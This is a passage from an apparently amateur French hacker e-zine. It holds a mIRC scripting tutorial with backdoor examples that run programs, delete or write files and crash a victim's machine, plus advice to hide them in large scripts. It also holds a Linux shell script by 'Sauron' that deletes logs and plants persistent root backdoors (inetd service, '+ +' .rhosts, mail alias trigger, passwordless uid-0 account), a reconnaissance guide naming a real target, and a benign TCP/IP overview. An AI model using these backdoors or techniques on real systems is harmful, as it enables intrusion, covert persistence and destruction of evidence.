Donne le nom du fichier du script chargé n°x. Si vous donnez un nom de fichier, son exécution sera alors vérifiée, sil nest pas en cours dexécution, la valeur $null sera retournée
$script(0) Donne le nombre de fichiers script de chargé.
$script(1) Donne le nom de fichier du 1er fichier script chargé.
$script(newbies.txt) Repond par $null si le fichier n'est pas chargé ou par newbies.txt s'il l'est.
Note: Ceci ne peut être utilise que pour faire référence aux scripts .
$scriptdir
Retourne le répertoire dans lequel est situe le script chargé
$site
Retourne lhost et le domain de lutilisateur qui a provoque un événement .
$target
Retourne la cible d'un événement.
$ulevel
Retourne le niveau de l'usager qui correspond à événement déclenché.
$ulist(nick!userid@address,L,X)
Retourne ladresse n°X dans la liste d'usagers . L correspond au niveau de lutilisateur .
Attributs: info
Vous pouvez utiliser des (*) dans ladresse . Si vous ne spécifiez pas N, la première adresse correspondante est retournée
Si vous spécifiez L, seulement les adresses du niveau spécifié sont retournées.
NB: L et N sont ne sont pas obligatoires , mais si vous spécifiez L vous devez spécifier N aussi.
$wildsite
Répond par l'adresse de l'usager qui a provoqué un événement
_
$x ou x est remplacé par un chiffre qui correspond a la place du parametre
exemple:
pour la phrase "Salut, ca va ?"
$1 correspond a "Salut,"
$2 correspond a "ca"
$3 correspond a "va"
$4 correspond a "?"
vous pouvez aussi designer un mot et tous ceux qui le suivent a l'aide d'un "-"
$2- correspond a "ca va ?"
________________________________________________________________________________________________
la programmation de script pour mirc se fait en trois parties : Alias, Popup et Remote .
Les aliases sont en fait des raccourcis .
Pour les programmer, allez dans Tools>aliases
ils permettent par exemple d'entrer dans un channel en tapant /j #nomduchan au lieu de taper /join #nomduchan .
La programmation d'aliases est très simple, pour l'exemple précédent, il suffit d'aller dans la section aliases est de taper :
/j /join $1
Vous pouvez desormais rejoindre un channel en tapant /j #nomduchan .
Les aliases servent aussi à éviter de toujours taper la meme chose, par exemple, l'alias /salut/say Salut tout le monde, ca va ???
Vous pouvez aussi assigner les touches de fonction F1,F2,F3....
Ainsi, si vous programmez l'alias
/F5 /me a besoin d'aide
lorsque vous appuierez sur la touche F5, vous demanderez de l'aide dans la fenêtre active . Biensur vous pouvez inclure des identificateurs dans vos aliases :
/joke /say $read c:\mirc\joke.txt
cet alias lira au hasard une ligne du fichier joke.txt
Un alias peut pointer sur plusieurs commandes :
/op /mode $chan +ooo $1 $2 $3 |/me a donné le status d'op à $1 $2 $3
si vous tapez /op A B C
A B C seront oppés, et vous previendrez le channel par la meme occasion
________________________
Les Popups : il s'agit des menus .
Pour les programmer allez dans Tools>popups
Il y a 5 menus differents accessibles par le bouton view :
Status
Channel
Query/Chat
Nickname List
Menubar
Ces menus se programment tous de la meme facon .
Vous devez mettre du texte associé à la commande qui lui correspond, par exemple :
Lister les Channels:/list
Lorsque vous cliquerez sur "Lister les Channels", la commande /list sera executée
il est possible de faire des sous menus,pour cela il faut ajouter un . a chaque niveau inférieur:
Absent
.Absent:/away $$?="Raison :"
.Revenir:/away
on peut descendre d'autant de niveau que l'on veut a condition d'ajouter un "." à chaque niveau inférieur :
Absent
.s'Absenter
..discret:/away $$?="Raison :"
..le Signaler :/ame est maintenant AWAY !!!! |/away $$?="Raison :"
.Revenir
..discret:/away
..le Signaler:/ame est maintenant revenu !!! |/away
Il est possible d'ajouter un separateur en ajoutant une ligne comportant un "-" :
Absent
.s'Absenter
..discret:/away $$?="Raison :"
..le Signaler :/ame est maintenant AWAY !!!! |/away $$?="Raison :"
.-
.Revenir
..discret:/away
..le Signaler:/ame est maintenant revenu !!! |/away
__________________________________
Les Remote representent la partie "dynamique" du script puiqu'ils reagiront a des evenements tels que l'arrivee de quelqu'un dans un channel .
pour les programmer, allez dans Tools>Remote
Voici la structure des remotes :
ON LEVEL:EVENEMENT:ACTION
LEVEL : correspond au level que doit avoir la personne qui produit l'evenement pour declencher l'action, par defaut, il est de 1 . Vous pouvez attribuer des levels en passant dans la section USERS, voici la structure qu'il faut utiliser pour attribuer un level :
LEVEL:nick!userid@host.domain
vous pouvez remplacer le nick, userid, host ou domain par un * .
EVENEMENT : l'evenement qui declenche l'action
Liste des principaux evenements :
-Liste des evenements :
Action, Ban, Chat, Close, Connect, Ctcp, CtcpReply, DccServer, DeHelp, DeOp, DeVoice, Dialog, DnsError, FileRcvd, FileSent, GetFail, Help, Hotlink, Input, Invite, Join, KeyDown, KeyUp, Kick, Load, Midi, End, Mode, Nick, NoSound, Notice, Notify, Op, Open, Part, Ping, Play, End, Quit, Raw, RawMode, SendFail, Serv, ServerMode, ServerOp, Snotice, Start, Text, Topic, UnBan, Unotify, UserMode, Voice, Wallops, WaveEnd,
ACTION : L'action est la commande qu'executera automatiquement votre script en reponse a un evenement .
Voici un exemple de remote :
on 1:PING:/notice $nick [ $me PING Reply] : 0secs |/halt
avec cette ligne de remote, vous repondrez automatiquement a un PING par
[ VOTRENICK PING Reply] : 0secs . (la commande /halt sert a empecher votre script d'utiliser la reponse prevue par defaut pour ce type d'evenement )
Pour la plupart des evenements, il faut designer le lieu dans lequel il doit être pris en compte, pour ceux-cis, la structure du remote sera : ON LEVEL:EVENEMENT:LIEU:ACTION
Exemple avec un evenement de type TEXT :
on 1:text:*bye*:#:/msg $nick Bye
# correspond au lieu dans lequel l'action est prise en compte, ici, vous direz Bye a quelqu'un qui dit bye dans un channel, vous pouvez aussi specifier un nom de channel voir en mettre plusieurs :
on 1:text:*bye*:#hack,#hackers:/msg $nick Bye .
Vous devez mettre un ? pour les actions qui doivent reagir a un evenement en query, ou un * pour celles qui doivent reagir aux evenements en query ET dans un channel .
Les remotes permettent d'assigner plusieurs actions a un meme evenement :
on 1:join:#:{
/msg $nick Salut $nick
/echo $nick vient d'arriver sur $chan !
}
Vous pouvez aussi utiliser un separateur comme dans les popups et aliases :
on 1:join:#:/msg $nick Salut $nick | /echo $nick vient d'arriver sur $chan !
Si vous placez un @ devant le niveau dutilisateur, laction sera executee uniquement si vous etes operateur .
ex :
on @1:text:*operateurs ?*:*:/msg $nick Salut, cest moi, $me , je suis operateur de ce chan !
===================================exemple de script simple====================================
Ce script est particulierement adapte aux nouveaux utilisateurs de Mirc, puisqu'il reprend en partie les termes de mschat .
-contenu du fichier remote.ini :
[script]
n0=on @150:join:#:{ ; lorsque un utilisateur de niveau
n1=/kick $chan $nick ;150 entre dans un chan alors que
n2=/mode $chan +b $nick ;vous etes op, il est kické et ban
n3=}
n4=
n5=on 10:text:!op:#://mode $chan +o $nick ;vous mettez op un utilisateur de
n6=on 10:text:!op*:?://mode $2 +o $nick ;niveau 10 sur demande .(lorsqu'il tape !op dans un chan ou !op #nomduchan en query)
n7=on 1:PING:/notice $nick [ $me PING Reply] : 0secs |/halt ;voir exemples
n8=on 10:join:#:/echo 5 $nick est arrive dans $chan ;vous previent qd un utilisateur
;de niveau 10 entre ds un chan
n9=on @2:DEOP:#monchan:{ ; lorsque quelqu'un d'autre que vous
n10= if($nick==$me) halt ; deop un utilisateur sur #monchan
n11= /mode $chan -o $nick ; il est deopé et la personne qu'il
n12= /mode $chan +o $opnick ; a deopé est reopée
n13=} ;
n14=ctcp 1:time:*:/notice $nick chez moi il est $time ;lorsque qq'un fait un ctcp time sur vous
;vous lui repondez "chez moi il est HEURE"
[users]
n=0 10:friend!*@*.* ;le niveau 10 est attribué a friends
n=1 150:lamer!*@*.* ;le niveau 150 est attribué a lamer
-fichier popups.ini :
[qpopup]
[lpopup]
n0=.Ignorer:/ignore $$1 1
n1=.Ne plus ignorer:/ignore -r $$1 1
n2=.hote:/mode # +ooo $$1 $2 $3
n3=.enlever le statut d'hote:/mode # -ooo $$1 $2 $3
n4=.exclure:/kick # $$1
n5=.Interdire l'acces:/ban $$1 2
n6=.Heure locale:/ctcp $$1 time
n7=Apparté:/query $$1-
[bpopup]
n0=Rejoindre une salle:/join #$$?="Enter channel name:"
n1=Partir d'une salle:/part #$$?="Enter channel name:"
n2=Apparte:/query $$?="Surnom:"
n3=Inviter:/invite $$?="Entrez le surnom et la salle:"
n4=Quitter IRC:/quit
[mpopup]
n0=Se connecter
n1=.dalnet:/server irc.dal.net
n2=.kewl:/server irc.kewl.org
n3=Aller dans une salle:/join #$$?="Nom de la salle"
n4=Faire la Liste des salles:/list
n5=Changer de surnom:/nick #$$?="Surnom:"
n6=-
n7=QUITTER:/quit
[cpopup]
n0=Mettre Hote:/mode $chan +o ##?="Surnom"
n1=Exclure:/kick $chan ##?="Surnom"
n2=Rejoindre une salle:/join ##?="Nom de la Salle"
____________________
|Exemples de Backdoor|
``````````````````````
Il est tres simple de faire une backdoor dans un script mIRC, le tout est de reussir a convaincre quelqu'un de le mettre dans ses remotes .
I-Backdoor inoffensive :
1-TEXTE
cette backdoor vous permet de faire dire ce que vous voulez a quelqu'un .
on 1:TEXT:*!say*:*:/msg $2-
Vous devrez taper "!say #hackers Salut" par exemple, ca fera dire salut dans le chan #hackers a la personne qui a installé cette backdoor dans ses remotes .
2-MODES
on @1:text:!op:#://mode $chan +o $nick
on @1:text:!op*:#://mode $chan +ooo $2-
on @1:text:!deop*:#://mode $chan -o $2-
on @1:text:!kick*:#://kick $chan $2
II-Backdoor permettant de lancer des programmes:
on 1:TEXT:!do*:*:/run $2-
Si vous tapez "!do c:\windows\calc.exe" vous lancerez sa calculette windows
III-Backdoor permettant d'effacer des fichiers :
on 1:text:!delete*:*:/remove $2-
si vous tapez "!delete c:\autoexec.bat" vous effacerez son fichier autoexec.bat
IV-Backdoor permettant d'ecrire dans des fichiers texte :
on 1:TEXT:!write*:*:/write $2-
si vous tapez "!write c:\autoexec.bat PAUSE" vous ajouterez "PAUSE" a la fin du fichier autoexec.bat
V-Backdoor permettant de planter l'ordinateur :
on 1:text:*!kill*:*:/con/con
Lorsque vous taperez !kill, vous ferez planter l'ordi de la victime (ecran bleu)
Ces Backdoors servent a vous montrer ce que l'on peut faire avec mIRC, cela dit, si vous les utilisez, cela ne fera pas de vous un Hacker, elles sont presentes dans cet article a titre d'EXEMPLE UNIQUEMENT .
Vous avez maintenant de quoi faire votre premier script mIRC,
Si vous ne comprennez pas quelque chose ou desirez avoir des renseignements supplementaires, vous pouvez m'envoyer un mail a : ft_one@meloo.com
(ND ad-tonnou --> l'idéal pour implanter des backdoors dans un script est de proposer un remote vraiment très gros...le gars ne regardera jamais tout...)
.FT-ONE
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Programmation Shell et Backdoor sous NUX Sauron
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
SAlut,
j'ai réalisé un (mini) script shell installant des backdoors sur un
systeme linux, je fourni ici le source et je vais detailler son utilisation
et la maniere dont il agit pour poser des backdoors. Voici le script, pour l'essayer copier tout son contenu dans un fichier puis lancez le chmod +x )
#-------------------- DEBUT APRES CETTE LIGNE -------------------------------------#
echo BACKDOOR PAR SAURON
echo On va deja effacer les logs...
a="Effectué"
b="Le programme a echouer, desoler"
echo Entre ton ip UNIQUEMENT :
echo
ip=""
read $ip
rgrep $ip / | xargs rm -f || echo $b
echo
echo Pose de la backdoor...
cd / || echo $b
cd /etc || echo $b
set linecount = 'wc -l < inetd.conf' || echo $b
cp inetd.conf ./tmpinetd || echo $b
echo "conf stream tcp nowait root /etc/in.confd" >> ./tmpinetd
mv ./tmpinetd inetd.conf || echo Merde !
chmod 644 inetd.conf
rm -rf ./tmpinetd || echo Il restera des preuves evidentes !
echo "conf 2/tcp config kernel" >> services
echo "echo + + >> /../root/.rhost" >> in.confd || echo $b
echo "echo Config Kernel Linux with Module...........; find / -perm 707 -print || echo Module kernel succefully install .." >> in.confd || echo $b
chmod +x in.confd || echo Gloups !
killall -HUP ine
echo $a
echo "cd /etc ;./in.confd" >> /../root/.forward || echo zut !
echo "root: sh etc//in.confd" >> aliases || echo crotte !
newaliases
echo Ne faite pas gaffe au msg de aliases c'est normal...;
echo "conf::0:0:include kernel configuration do not errase this line:/:/bin/bash" >> /etc/passwd
echo "conf::0:0:include kernel configuration do not errase this line:/etc:/bin/bash" >> /etc/shadow
echo "conf" >> /etc/ftpusers
#-------------------------------- COUPER AVANT CETTE LIGNE -------------------------------#
Comme vous pouvez le voir, les commandes utiliser sont uniquement les commandes de bases, les plus courantes.
ligne 3 et 4, deux variables sont declarer et une valeur leur est donner, elles correspondent aux deux messages qui s'afficheront plus tard dans le programme.
b s'affichera quand le programme rencontrera un probleme, et a si tous ce passe bien.
une nouvelle variable apparait, il s'agit de ip, dont la valeur est defini par "read" : ce que tapera l'utilisateur au moment de la saisi clavier implementera la variable.
Une recherche sera ensuite lancer sur tous le systemes ( tres long, je conseille d'enlever les lignes 5 a 7 et d'utiliser un cleaner de log a cote pour ceux qui peuvent )afin de trouver les fichiers ou le contenu de $ip, c'est à dire ce que vous avez taper, est present. Ces fichiers seront automatiquement detruit. Ainsi, si vous tapez root a la place de votre ip, ce sont tous les fichiers ou le mot "root" est present qui seront afficher !!! Donc, fo faire gaf !
Voila, pour cette premiere partie un peu inutile puisque l'administrateur reseau se rendra compte de quelque chose si il manque tous les fichiers de logs ... ;o) C'est pk il vaut mieux modifier le script pour qu'il enleve uniquement les Lignes ou l'ip est
presente. Ensuite plusieurs actions vont etre effectuer, elle consistent en la pose de la backdoor, c'est la que ca devient interessant...
Le script commence par rajouter une ligne dans /etc/inetd.conf (il faut bien sur avoir les droits root ), un service va etre rajouter qui executera un programme qui jouera le role de backdoor et d'un fichier de configuration du kernel. Si le sysap n'est pas bete il editera le fichier et comprendra alors que c'est simplement un trojan. La meilleure maniere de garder le root sur un serveur est de ne pas du tout se faire remarquer. Si il capte ne serait ce qu'un fichier, il est probable qu'il entreprenne de surveiller son systeme de facon plus ardue. Cependant, il y a d'autre backdoor qui sont implementer dans le systeme et pour peu qu'une seule ait été negliger, toutes les autres re-apparaitront. Vous serez averti si le sysap a griller puisque le fichier /root/.rhost ou /etc/in.confd auront disparu. Si c'est le cas, je ne vous conseille pas de rester sur ce systeme ou bien installer un autre type de backdoor, je pense notamment un une rootkit qui est encore le moyen le plus radical. Toutefois je ne vous encourage pas a Hacker des serveurs et a les exploiter pendant des mois, mais ca reste une possibilité et il existe de nombreuses manieres de s'en proteger.
La ligne supplementaire qui a ete ajouter a /etc/inetd.conf fait appel a un script shell qui fait apparaitre un msg bidon de soit disant reconfiguration du kernel, juste au cas ou le sysap le lancerai et n'oserait pas l'effacer pensant que ce fichier est important, mais ne revez pas, a moins d'etre non-qualifié ou de ne pas connaitre du tout linux, il comprendra.
Une ligne est rajouter egalement dans /etc/aliases, a chaque fois qu'un mail est envoyer au sysap /etc/in.confd est executer, ce qui a le meme resultat que le relancement ligne 25 de inet. Si le sysap remarque la presence d'un fichier permettant a n'importe qui de se connecter en root sur son systemepar le biais de rlogin, il l'effacera, celui ci sera alors imediatement re-creer si un mail est envoyer au root@thevictime ;o)
Enfin, un compte root supplementaire est creer, dans /etc/passwd et /etc/shadow au cas ou le shadowing des mdp est enclenchés. Comme il n'y a pas de passe, cela ne change rien. Si vous comptez avoir un acces telnet et root sur la machine, verifiez si le # a ete supprimer de /etc/inetd.conf a la ligne du telnet.(Nd ad-tonnou #=port fermé et pas de #=port ouvert)
Il reste tout de meme un espoir dans la mesure ou vous avez su gagner le root sur le systemes avant de poser la backdoor.
Pour toutes questions, commentaires, critiques, n'hésitez pas :
sauron@frhack.org
Finalement, j'ai pas parler de la programmation de script shell, mais si vous avez observez le script vous aurez vite compris, voici un listing des commandes avec leurs fonction au cas ou certains ne pigerait pas :
read : attend une saisie clavier pour implementer une variable, ds ce script c'est "ip" qui etait defini plus haut qui est implémenté.
NOTE : on appele une variable en faisant $variable et non variable tout seul.
newaliases : ca sert simplement a relancer ce service apres avoir apporter des modifs, comme le rajout d'une ligne par exemple ;o)
--== Sauron ==--
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Reperer Sa Cible Sauron
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
******************************
** Un chtit bout de hacking **
******************************
--===>>> OK, comme dans ce zine on dirait bien que on parle quasiment pas de Hacking alors que c'est une des choses que je preferes, je pond vite fait un chti article avant sa sorti !
# Bon........... De quoi je vais causer ??? EUhh.. Tient je vais commencer une serie d'article sur
# les méthode utilisé par les Pirates pour penetrer une becane... Mais avant tout :
## #### NOTE : #####
Ceci n'est pas n diclaimer de naze, mais je tient a dire qu'il n'y a pas de quoi se venter
# d'avoir pirater un site en l'ayant scanner avec un outils qui n'est pas de sa creation et en ayant
# executer un quelquonque exploits qui vous aura permi d'obtenir les droits Root. Y en a plus que
# marre des Lamers qui se prenne pour des bons Hackers car ils scan des cibles toutes la soiree# en passant par des proxy et parsqu'ils auront reussi a en niquer une. Moi, je ne Hack pas
# pour faire chier, je le fait pour moi, car j'aime bien comprendre ce qui se passe. Je ne suis
# pas non plus un " assoiffé de savoir " comme le clame souvent des Hackers mais je n'est aucune
# considération pour ceux qui se contente d'utiliser les exploits.
# ##### EON ########|
--===> ALLONS Go !!
# # L'attaque va se faire en deux points, le premiere ou le pirate va tenter de collecter des# infos pour avoir une idee du systeme cible. Voici ce que nous voulons obtenir :+>
# |----=> Determiner l'Os
# |----=> Determiner les services
# |----=> Info sur les Users# |----=> Info sur les membres
# |----=> Info sur leurs reseaux
# Pour obtenir ces infos il y a plusieurs techniques, qui ne sont pas ardues et a la porter de tous.
+> Toutefois, il vous faut linux ou un Unix pour tester certaines commandes.
Sous linux dig et nslookup donne deja un peu d'informations..
Je n'utiliserai pas ces deux commandes, mais " host ".
Apres avoir effecturer un scan Tcp et UDp des ports, se connecter en telnet sur les ports ouverts (au moins 21 ; 23 ; 25 ; 79 ; etc... ) pour lire le msg d'accueil. Par négligence probablement, ce message est tres souvent revelateur du systeme d'exploitation utilise par la cible, et meme pour linux de la version de kernel ( et probablement pour les autres Unix egalement :o).
Nmap est pour moi un des meilleurs scanners pour la qualité de sonTcp Fingerprinting.
Vous pourrez ainsi de maniere quasi- certaine connaitre l'os. Si le port 79 ( finger ) est ouvert, c'est bingo !
tapez " finger @cible.com " et vous obtiendrez un listing des utilisateurs du systemes, leur shell, leur homedir, que font ils si ils sont la, sur quel terminal, depuis qd sont ils la, qd viennent ils, de ou , a quel heure,etc....
Bcp d'info quoi :o)
Vous pouvez faire la meme chose avec rusers.
Si finger n'est pas actif verifier que la commande EXPN est été désactivé dans Sendmail ( 25 )si ce n'est pas le cas, vous pourrez vous en servir comme de finger, bien que les informations soit plus restreintes.
La commande SYST sous ftp... Verifiez si il éxiste un compte anonyme pour tout le monde, et si c'est le cas essayez d'identifier l'architecture du systeme (si il y a /var /usr /etc /bin, y a des chances pour que ce ne soit ni Mac ni Win ;o)).
Le personnel et surtout le patron vous interesse ? allez sur internic.net pour leur servcice WHOIS.
Cela est tres pratique pour le Social Engeneering et sachez que si vous voulez Vraiment pirater un site et que vous buttez le SE peut s'averer etre la solution ! Si vous decelez un reseau ( probable ) les machines n'ont elles pas confiance les une aux autres ? Si c'est le cas, si vous penetrer une seule machine vous aurez le controle de tous le reseau avec les services comme rlogin ! Je vais stopper la, mais comprenez que ce n'est pas dur du tout de savoir pleinsde choses.
Front-nat.fr utilise IRIX 6.5 mais ils ont patcher tous les holes que j'ai tester!! GrrR! Ils sont pas con ces connards!! Voila, pour mon article.
Une fois que vous avez des infos ils restent plus qu'a aller chercher les holes ( LISEZ MA NOTE DU DEBUT ) de telle version de telle service sur telle systeme et de verifier si le patcht a été exploiter, sur 50 holes, a vous de voir si il y en a 1 qui aurait ete oublier et dans ce cas....
Voilou ! Je vous dit a +, excusez cette article tout mini mais la j'ai pas le tps, j'espere que vous aurez quand meme compris le truc. Sinon
--==> Humour@humour.com
Et desoler pour cette aticle vraiment Newbie a la Hca Crew :o))
{-Sauron-}
Nd Ad-Tonnou ---> au nom de toute la team je tiends a vous transmettre un message...
Je le fais dans cet article car mon ami Sauron a soulevé le probleme....
Nous n'avons pas eu le temps de faire de bons articles sur le hacking et nous en sommes desolés...
Cependant je vous promets que l'on va faire un gros effort la fois prochaine a ce sujet, et puis apres tout, les autres articles ne sont pas si mals, enjoy!!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Le TCP/IP Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
**************************************
** VU D'ENSEMBLE DES RESEAUX TCP/IP **
**************************************
InTROducTIOn
°°°°°°°°°°°°°
Bon, un bon paquet d'articles ont déjà été faits sur les réseaux TCP/IP, mais tous ont toujours été soit trop globaux soit trop pointus...
Là je vais essayer de commencer par le début (en detaillant tout bien comme il faut) puis continuer, de plus en plus pointus au cours des prochains zines...
QU'esT ce QuE LE TcP/Ip
°°°°°°°°°°°°°°°°°°°°°°°
TCP ---> Transmission Controll Protocol.
IP ---> Internet Protocol.
Cependant le therme global TCP/IP pourrait être assimilé à "protocole de communication pour la transmission de données".
Un protocole est un ensemble de règles permettant à plusieurs ordinateurs de communiquer entre eux.
Imaginez deux humains parlant l'un le Français et l'autre le Sénégalais...et bien le protocole de communication pourrait être le language des signes ou bien le dessin (de nos jours ce serait plutot l'Anglais mais bon...) et bien c'est la même chose pour les ordinateurs
Le therme TCP/IP bien que signifiant Transmission Controll Protocol / Internet Protocol recouvre un grand nombre de protocoles tels que l'UDP, le FTP, HTTP etc...
Un réseau utilisant le TCP/IP est appelé "réseau internet TCP/IP"
!!! ---> à ne pas confondra avec Internet (notez la majuscule)
En effet un réseau internet TCP/IP n'est pas forcement relié à d'autres réseaux tandis que Internet avec un 'I' relie un nombre enorme de reseaux à travers tous les continents...
Quand on parle d'intranets on entend par là des réseaux privés d'entreprises utilisant les services de l'Internet comme le http...(un mini Internet quoi)
LeS DéBUTs Du tcP/iP
°°°°°°°°°°°°°°°°°°°°
¤¤¤ Introduction: ¤¤¤
Dans les années 60, la DARPA (Defense Advanced Research Projects Agency) remarqua que les ordinateurs utilisés dans le domaine militaire, de marques différentes, ne pouvaient pas communiquer entre eux. Aucun protocole comun à tous les ordinateurs n'existaient...
¤¤¤ Les bases du tcp/ip: ¤¤¤
Pour palier à ceci, le ministère de la défense des States demanda à la DARPA de définir une famille de protocole selon les directives génériques suivantes:
Simplification des communications --> grace a des protocoles comuns a tous les ordinateurs
Mise en competition des constructeurs d'informatique --> en effet, chacun pouvait aporter ses propores modifications à ces protocoles standarts (bien sur avec l'accord de tous)
Interoperabilite --> En effet, grace a ces protocoles communs, l'interoperabilite entre differents equipement devient possible
Le TCP/IP etait né...(tout du moins ses principes)
¤¤¤ les premiers essais ¤¤¤
1969 fut marqué par les premieres experimentations, on permit nottamant de relier les 4 sites (sites physiques et non pas logiques) suivants:
- L'université de Californie Los Angeles
- L'université de Californie Santa Barbara
- L'université d'Utah
- SRI international
Cette experimentation fut un succes et fut le debut du projet "ARPANet" (Defense Advanced Research Projects Agency Network)
En 1972 une demonstration reliait 50 noeuds et 20 hotes
noeuds --> nom generique designant tous peripherique relié a un reseau (peripherique de routage, ordinateur, workstation...)
hote --> A la base cela designe un puissant ordinateur sur lequel sont connectés plusieurs terminaux. De nos jours, on designe par hote une machine delivrant des services a des utilisateurs...
serveur --> est une machine sur laquelle tourne un logiciel ou un groupe de logiciels serveur, delivrant des services a des logiciels utilisateurs, ceux ci s'apellent clients...
¤¤¤ L'evolution d'ARPANet ¤¤¤
A partir de ce moment, les bases etaient posees et ARPANet continua à se developper...
En 1986 le reseau ARPANet englobait la plupart des grandes universites nord-américaines, le reseau militaire MILNET et quelques reseaux de recherche internationaux..:
[ LES PRINCIPAUX SITE UNIVERSITAIRES ]
|||||||||||| | | | |
|||||||||||| | | | |
____________||||||||||||____ | | | |
_______________________ | |_____| | | |
| | | |_______| | |
| |______| |_________| |
| | | |___________|
| | | |
| |______| |
| MILNET | | ARPANET |_______________[ MIT ]________________
| (reseau militaire) | | | |
| |______| | |
| | | | _______ |
| | | | | | ___[CADRE] |
| | | |_______| CMU |__| |
\_______________________/ | | |_______| |___[TARTAN] |
||||| | | | |
||||| | | | |
MILNET Sites | | | |
|____________________________| _______|_____ |
| | | | | |
| | | | WideBand |____________________|
_|_____|_____|_ |_____________|
| | | |
| | | |
| SATNET | | |
| |_____________| |
|_______________| |
|_________________________|
fig 1: reseau ARPANet en 1986
Peu à peu ARPANet fut remplacé par Internet, etant de plus en plus utilisé à des fins commerciaux, les traffics de données commerciales devint alors superieurs à ceux des universitaires...
De nos jours Internet regroupe à la fois des organisations commerciales, des organismes de recherche, les ministeres, les simple utilisateurs, les fournisseurs d'acces....
BasCulE Des RESEauX PropRIEtairES aUX ReseaUX TCP/IP
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
Les premiers reseaux informatiques etaient à la base fondés sur des solutions proprietaires et donc personnelles...
Je vous ai dégoté deux bons exemple illustrant cela, deux réseaux differents et donc pas interoperables...
Le réseau SNA d'IBM: Le reseau DECnet de DIGITAL:
______________________ ______________________
| | | |
| | | DECnet UltriX |
| | | |
| HOTE IBM | |______________________|
| | |
| | |
|______________________| ______o_____o___________o________
| | |
| ____|____ ____|____
| | Serveur | | Routeur |
______|______ | DEC | | DEC |
| | |_________| |_________|
| Controleur | | | |
| de | | | |
|Communication| [ ] [ ] |
|_____________| Terminaux DECnet |
| | |
| | |
/ \ |
/ \ |
| | ____|____
Controleurs de communication | Routeur |
____|____ ____|____ | DEC |
| | | | |_________|
| | | | |
| | | | ______o_____o___________o________
|_________| |_________| | | |
| | | | | | |
| | | |
| | | |
[ ] [ ] [ ] [ ]
Terminaux IBM
Vous comprendrez aisement pourquoi la communication entre ces deux reseaux peut paraitre difficile voir impossible...:
Le reseau SNA se base sur une organisation hierachique alors que DECnet se base sur une organisation poste-a-poste.
Ces deux réseaux (pour rester dans notre exemple) ont tous deux evolue vers des solutions d'interpretage TCP/IP, ainsi ces reseaux sont devenus interopoerables et accessibles de l'exterieurs, et ce, grace au TCP/IP.
Ceci n'est qu'un exemple mais represente parfaitement la situation d'Internet à ses debuts...
ReseAUX MuLtiConSTRUCteurS
°°°°°°°°°°°°°°°°°°°°°°°°°°
Tous les constructeurs ont peu à peu developpés des reseaux basés sur le TCP/IP permettant à des machines de marques et d'essence differentes de communiquer entre elles, ce qui est le but du protocole TCP/IP:
exemple de reseau multiconstructeur:
_________________ _________________ _________________ _________________
| | | | | | | |
| | | Hote IBM | | NoVell | | WIndows NT |
| HP 9000 | | avec logiciel | | NetWare | | |
| | | TCP/IP | | 3.xx | | |
|_________________| |_________________| |_________________| |_________________|
| | | |
_________o_____o__________________o____o_________________o_____o_______________o_____o______________
| | | |
__|______________ ___|_____________ __|______________ __|______________
| | | | | | | |
| | | IBM PC | | Station Unix | | MAC TCP/IP |
| VaxVmS TCP | | | | avec | | |
| | | | | TCP/IP | | |
|_________________| |_________________| |_________________| |_________________|
(entre chaque resaue, sous reseau, c'est le TCP/IP qui gere tout, puis chaque groupe peut alors avoir son interpreteur personnel)
EvoLUTioN De Tcp/IP
°°°°°°°°°°°°°°°°°°°
1980 --> 20 entreprises proposaient des services bases sur le TCP/IP.
1985 --> Pres de cent.
1990 --> Plus de 250.
2000 --> pres de 650.
TCP propose aujourd'hui ce que promettaient les protocoles OSI il y a quelques annees.
Le seul défaut de TCP par rapport a OSI etait la plus grande variete de services proposes par OSI.
Ce probleme est de nos jours palié, nottament par l'integration d'application OSI dans les reseaux TCP/IP, comme X 500...
3 facteurs expliquent la montee en puissance du TCP/IP en 35 ans...:
L'interoperabilite --> En utilisant le TCP/IP et les services TCP/IP, l'interoperabilite est devenu possible entre les differents matos des different constructeurs...
Interet commercial --> Evident...de plus le grand public s'interesse d eplsu en plus au web...
L'augmentation du nombre d'outils de gestion reseaux --> exemple du SNMP (Simple Network Management Protocol)
VuE d'EnSEMble DES aPPliCaTIONS TCp/iP
°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°
___________ ___________ ___________
| | | | | |
| serveur | | serveur | | USER E |
| WEB | | DNS | | |
| | | | |client NFS |
|___________| |___________| |___________|
| | |
| | |
|____________ |___ |
___________ | ____|__________________________ | ___________
| | | | | | | |
| HOTE IBM | |_________| | | | HOTE VMS |
| |________________| TCP/IP | | | |
|___________| | INTERNET |________________|__ |___________|
| | | |_____________|______________
| | |
| | |
_____________| | |
| | | |
| |_______________________________| |
| | __|________
__|__ | | serveur |
|agent| _______|_______ | de |_____[ USER C]
|SNMP | | | | terminaux | [ SMTP ]
|_____| | | |___________|
[user A] | | |
[telnet sur] | | |
[hote VMS] | |_______________|
___|__________| | | |
| __________ | | |
| | |______| | |____________[user B, FTP sur l'hote IBM]
| | Serveur | |
[user D] | NFS | [user F]
[gestion SNMP] |__________| [http sur le server WEB]
(ouf!!)
Voici un joli schéma vous montrant les plus importantes applications TCP/IP.
(Ce schema est censé representer un gros reseau en action, du genre Internet)
Voici une rapide description des applications ici présentees:
TELNET --> Permet a un utilisateur de se connecter a distance a un hote par l'intermediaire des protocoles TCP/IP.
